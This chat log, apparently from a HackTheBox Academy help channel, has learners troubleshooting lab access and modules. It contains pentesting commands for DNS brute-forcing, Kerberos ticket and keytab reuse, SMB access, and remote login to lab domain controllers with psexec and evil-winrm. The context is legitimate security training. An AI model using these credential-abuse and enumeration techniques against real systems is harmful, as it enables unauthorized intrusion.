What exactly does he want me to do?

same thing as what you did previously, just with a different user to a different directory

im root in machine

What is the name of the network interface that MTU is set to 1500? is the question im stuck on, i watched a video on how to do it and the answer is ens192 but on my pwnbox it comes up as eth0

ssh into the target

how

ssh user@ip then enter the password

the section itself taught you how to do it, there's a whole paragraph on "Logging In via SSH"

I dodnt read it lmao

I will now thank you

nope I'm afk right now

it keeps saying connection timed out

is the ip correct?

yes

are using a vm or the in browser pwnbox

browser

works for me

just switch vpn server, you'll get a new box, also wrong channel, read #welcome to get verified

was rConfig from Shells n payloads slow for other too? it takes 10 sec or more to even switch tabs. did the other section before with status.inlane and worked perfectly

skill issue

switch vpn servers maybe

Anyone else having problems with ssh into labs? I'm using pwnbox in the browser on linux priv esc module

kk sory

did that aswell. no help. and the first time we met with the rConfig site it was insanly slow aswell.... maybe site issue?

maybe

do I put the password on the same line

cus I haven't been

no just user@ip and enter, then it will ask for password, just type it in even if you don't see it appear on screen

it just freezes for like 1 min and then says connection timed out

There is an issue for me too, ssh is just hanging

reset both pwnbox and the target then

I already have and it did the same

Yea me too, I think there must be a problem because some other people are having issues with vpn

Why when I am trying to access to the file I am getting an "no found" ? https://academy.hackthebox.com/module/136/section/1289

I used all wordlists shown in this section and I tested all files when I was getting "file uploaded" and the only thing I got one time : "Forbidden".

I tried to combine the forbidden case with char inj but all are "forbidden".

Consider double-reverse extensions ?

if regular way didn't work then try that.

I used it.

I think the prob comes from the wordlists from HTB.

I am looking at an article to have all extensions.

I got +600 shells extensions now.

Before only 72 with techs from the section.

so you got it ?

No...

I'll wait the end of the intruder and create a script.

ok

keep in mind that consider double-reverse extensions mate

Hi guys, the target spawned for me but it doesn't respond, anyone with the same issue?

same

Anybody complete the Windows Privesc module , SeImpersonate and SeAssignPrimaryToken section recently, cannot connect via mssqlclient.py , tried nmap and no open ports, almost like this section is broken

anyone?

@prince_1hunter it's seems we have this similar problem s mate.

I switched to another VPN (US West) and Im good to go

The vpns don't have region names

Just us-academy-[1,2,3]
And eu-academy-[1,2]

The pwnbox has region names

Thats what I meant, moved to Pwnbox and did West and Im g2g

That's not the same as changing vpn regions

I used another Pwnbox region and it works now, that better?

Attacking common services > attacking ftp. I’ve scanned this six times there are no ftp ports open. Is there something wrong with this lab

You’ll have to reset the lab several times.

I faced a similar problem.

I didn’t I’ve

Did twice

PITA

I’ve seen many people complain about this, what’s up with this lab?

5th time worked

Hi guys, on attacking thick clients. Fatty-server.jar doesn't do anything when I run it. I'm assuming it should? I already had to backtrack because I messed up and it only let me download an empty file. This file is larger and can be decompiled so I guess its the right one this time. I did all the stuff to the end of module but then it wouldn't run. But yeah, it doesn't even run immediately after download. 🤷‍♂️

Is it thicker than a snicker?

Is it just me or has stability of labs been worse than usual lately

It’s terrible

Today at least it didn’t even show up ftp for the ftp lab until the 8th time now it’s slow as hell for a individual port scan

N/m I think I know what to do

Yes... That was the worst module so far.

This attacking ftp lab is so awful I have to reset it so many times

@next bronze i want to acces linux01 but every user status acces denied

There's a linux01 system ccache/ticket

checking

Still stucks...

After 2 try of burp intruder due to the end of the lab 😭.

i dont find /tmp and keytab and user directory

Well because the linux01$ keytab is kept somewhere else

Maybe the showcased tool can help you find it

FOOTPRINTING
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
HELP me pls

try to use other wordlists

Find all Zones

Hi, experiencing connectivity issues today to the windows "machines", both from vpn and pwnbox. Is it just me ?

I tried them all and only 1 of them allows transfer @acoustic owl

A zone does not necessarily have to allow a zone transfer. The module shows you what you can do in such a case.

@acoustic owl For example, from an address we found (vpn.internal.inlanefreight.htb) we will make a bruteforce attack again ?

Yes, you can try to see if you can find a host with the help of a list.
But think about which subdomains are probably hosts and which might be a zone

@acoustic owl for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-110000.txt);do dig $sub.ns.internal.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
I tried all of them but no result

Attacking FTP from the attacking common services. I have reset this lab switch servers all types of things and for some reason, I am not able to get on the port 2121 anymore. This lab is most likely broke or something. Reached out to support and he just says “it works for me”, others in the prior chats have said it’s a known issue. What should I do?

try pwnbox

Your list is far too big
Take a small list. Anything more than 4999 entries is too big

@acoustic owl I changed it to 5000 but I still can't find it ( for sub in $(cat /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt);do dig $sub.ns.internal.inlanefreight.htb @10.129.14.128 | grep -v ';|SOA' | sed -r '/^\s*$/d' | grep $sub | tee -a subdomains.txt;done
) Is this part correct? sub.ns.internal.inlanefreight.htb

5000 is to big 🙂

its half

hey guys, On module "Password Attacks", Section "Pass the Ticket (PtT) from Linux" the very first question says " SSH to 10.129.23.109 with user "david@inlanefreight.htb" and password "Password2"
Connect to the target machine using SSH to the port TCP/2222 and the provided credentials. Read the flag in David's home directory." I added inlanefreight.htb to my /etc/hosts but when trying to ssh it says "permission denied."

Spoiler

🙃

is there a way to see how much cubes you get from completing a module?

Anyone who has done ATTACKING COMMON APPLICATIONS on Academy do you know if it includes a section on phpmyadmin? it comes up in the website search but doesn't mention it in the brief/description

Yes check your profile

could someone help me?

DM me

No wait I think I found it.

nice

Not sure but my script returned more that one line "Testing $filename".

Guys I can't filter modules based on tiers.

Is there a path for beginner?

the modules are individual lessons, not paths, you need to go to the paths section for that i think

I'm using from phone btw?

Can I sort by tier in laptop

yeah

the search and sort functions on htb are great

Is there a beginner path?

Yes

If you look under the "paths" section there's the Information Security Fundamentals path

Should I do hackthebox academy or do try hack me for a while and return to htba

Htba will be better

It actually mostly is explaining things and giving you a lab to practice on

Will I be doing actual htb labs at the end of a path or something?

every module you have hands on practice and a test to ensure you've learned the lesson

Is the info in the lesson correct? I read that sometimes they give misinformation and stuff

This question really confused me. Do I need to access it by pivoting? I'm already on a linux01 machine

Pivoting not required

The info is correct

It is correct. Everyone makes mistakes, don't get me wrong, but HTB has the best quality and content for learning about this stuff. You won't find a better training resource.

There is a machine ccache file that allows the machine access to the domain

Also I read that the labs sometimes are very hard and out of syllabus for the lesson they just taught.

Ok

that file is on the dc01 machine ?

pentesting is not easy

I've only ran into that maybe once

Everyone makes mistakes indeed. Hope the site is in a really good state right now

I would highly recommend

It's generally always been in a good state for knowledge

No

It's on the linux01 machine you're on

Respond for this message please

I did

Pentesting is not easy?

The module and sections prepare you for the labs

sudo smbclient -U david \\10.129.192.47\david -t 60
[sudo] password for murali:
Password for [WORKGROUP\david]:
Try "help" to get a list of possible commands.
smb: > ls
. D 0 Fri Feb 11 16:13:03 2022
.. D 0 Fri Feb 11 16:13:03 2022
Backup.vhd A 136315392 Fri Feb 11 17:46:12 2022

    10328063 blocks of size 4096. 6119444 blocks available

smb: > get Backup.vhd
parallel_read returned NT_STATUS_IO_TIMEOUT
smb: > getting file \Backup.vhd of size 136315392 as Backup.vhd SMBecho failed (NT_STATUS_INVALID_NETWORK_RESPONSE). The connection is disconnected now
I am unable to download the file any help?

I am unable to download the file any help?

Reset lab or change vpn regions and download a new file

That's not what I said

i did it like 3 times now

Also why are you adding -t 60

i thought that it is beacuse of timeout so i increased the timeout with that

The error you're getting btw is a connection error

how -_- this machine have julio david carlos..

It's not in /tmp

What did u say. Sorry I can't tell what you said

You are very often given the tools to answer the questions even if it's not copy/paste from the examples

Ok

There is a tool mentioned at the end of the section that can do a lot of the enum for you

linikatz..

understand

I also said this way earlier

still stuck guys need help

I'm sorry I didn't realize it, I understand it now but I'll try it right away.

It's david@inlanefreight.htb@ip

The username is david@inlanefreight.htb

Thanks

so

i prefer to use evo email rather than cli for the smtp stuff is that a no no

It's not disallowed

But it's better to learn the CLI stuff

And once you learn CLI, the GUI will seem dumb

why not working

Perhaps there's others

this command its true?
kinit linux01@inlanefreight.htb -k -t /etc/krb5.keytab

bcs no accepted format

I didn't use that file

yeah thats the wrong file

Also it would be linux01$

oh understand wrong file

I thought it was correct when I saw Linux 01 ntlm or something like that in this file.

Well, it's not

Guys. To unlock one tier 3 module I need 50usd. Isn't that expensive af? 😮😮

It's cheaper if you do a monthly subscription

Also, I wouldn't worry about t3 until you get the basics

Hi can someone please help me here >Log in to the ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL Domain Controller using the Domain Admin account password submitted for question #2 and submit the contents of the flag.txt file on the Administrator desktop. < || i tried psexec.py FREIGHTLOGISTICS.LOCAL/sapxxx@ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -target-ip 172.16.5.xxx with password Pxxxxsso and i tried evilwinrm as well ||

and i have connection vv,:

Your screenshots still contain spoilers, (marking as spoiler still does little-to-nothing) but it sounds like some auth errors to the DC. Is it in your hosts file?

yes it is

ill delete them

Is it in there as both DC03 and the fqdn?

yes sr

No it's not

You just have the FQDN in there

Also you should use the DOMAIN/USER for the account

okay thank you

Hi everyone nice to be in this group! i have an issue getting started with my first module on hackthebox. When i connect the openvpn on my virtualbox kali i get a notification saying successful (also on the website) but when i ping the ipadress it pings endlessly in a loop. How can i fix this? Does anyone know. Thanks for all the help

are you pinging a box from kali?

Hi, I want to know what is the best way starting off with knocking the boxes from intermediate to advanced ?

Ping always goes until you stop it in linux

Unless specified

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Yes kali is installed on the virtual box on my laptop and connected to the internet via bridge eth0 setup

yeah then the ping command will continue until you send a command break

Thanks for clearing me up on that

You can do -c 5 I believe to only have it ping 5 times

I have been struggling getting out of a command in VB. The usual Cmd+C is not linked to the virtual os. Anyone have experience with how to set it up correctly? Also much appreciated!

Thanks for the reminder totally neglected to limit this

Cmd/ctrl c should end it

thanks a lot @fathom pendant

by chance, are you using macOS as your host OS

But it could be that your keyboard is a different layout, so you'd need to change in settings

Thanks for the link!

This time it’s windows on my host

ok

Cmd isn't a windows key

Ctrl+C should command break then

Ok i will try to figure this out

It sounds like you can type fine so it might not be a layout issue

Just a user error

I tried that instead what happens is the virtual window itself does something and exits fullscreen (if i’m in it)

hm

Are you using the right or left ctrl key

Generally everything seems to work just the command C is something different. I once managed by accident but didnt register what i had typed

The right key is the host escape key in virtualbox

The left one usually

Just to clarify by command key “ctrl” is meant right?

i don't know much about VirtualBox so i can't say for certain

Yes

I have a german keyboard layout so i have to translate sometimes to be sure

That's likely it

Thanks for your help though

You'll have to look up and Google settings that work

Alright. I will try that thank you!

You can remap the host escape key in virtualbox I believe

Yes this I successfully did. And it works. I tried the same with the command key but didn’t seem to work yet

Yeah that might be needing to go into the keyboard settings in your vm and changing it to a German keyboard layoit

https://www.baeldung.com/linux/console-change-keyboard-layout

Here's a list of many ways

I have a further question with the general usage. I tried the introductory problem “meow”. And generally everything was fine in the beginning until i hit “submit root flag”. While i dont want you to spoiler me the result itself i am curious do i need to use the terminal to get my answer or is it all within the app/website? (Kinda how i got to the whole pinging and command topic in the first place)

Amazing thank you for the link

That's a starting-point machine, not academy module

Pinging just tells you a host is up

You need to scan, enumerate, and exploit your way through the system

Sorry for the misunderstanding i called it module by reflex.

#starting-point is the place to ask about those, you'll need to read and follow #welcome to access it

Ok so i did understand it correctly and i interact with the website and machine via my local terminal (like in real life sort of)

Via the linux vm you're using

Alright!

If there's a webpage running, you can use a browser to see it

Gotcha

The starting point machines all have walk-throughs to help guide you

The root flag is the flag found at /root/flag.txt usually

Yeah i’m not quite getting the same results as the walkthrough so i’m spending some extra time figuring out what i did wrong

You might not

As the walk-through might be using older versions of tools

So tool output may differ

Ah ok thats good to know

We're straying off-topic for the channel

Read and follow #welcome to access more of the server

Thank you so much for your time and effort to help me out it has been very useful to me!

could someone help me with "Password Attacks" section "Pass the Ticket (PtT) from Linux"

Maybe if you ask your question here

This Question "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."

Yes but what are you having issues with

That's just restating the question

there was the a cacche file in the /tmp folder, i tried using it like export KRB5CCNAME= but it doesnt worek

The section goes over importing tickets and such

Is it expired?

like after that i tried using smbclient //dc01/julio -k

doesnt work

There are multiple ccache files

i tried all three of them

none worked

That sounds odd bc one should work

And you did export KRB5CCNAME=/path/to/file?

yea

it says this "gensec_spnego_client_negTokenInit_step: gse_krb5: creating NEG_TOKEN_INIT for cifs/DC01 failed (next[(null)]): NT_STATUS_INVALID_PARAMETER
session setup failed: NT_STATUS_INVALID_PARAMETER"

common services easy box. i need a nudge for initial user foothold

i cant anon into ftp, and user-enum wont find anything. not sure if i am doing something wrong

also hydra wont crack anything

i should use smbcliet right??

humangod i need help again\

target the mail services.

how can I help?

Anyone know how to open the docx file on medium skill assessment on password attacks module? Can’t install libre on the parrot os jump

This Question "Check the /tmp directory and find Julio's Kerberos ticket (ccache file). Import the ticket and read the contents of julio.txt from the domain share folder \DC01\julio."

there was the a cacche file in the /tmp folder, i tried using it like export KRB5CCNAME= but it doesnt worek

you can send it over to a windows vm / machine and open it word.

i cant even find the initial user

Thought that but kind of expected hack the box to provide the method haha

Set your timeout for longer

on user-enum?

password attacks?

yea

i tried all of the cacche files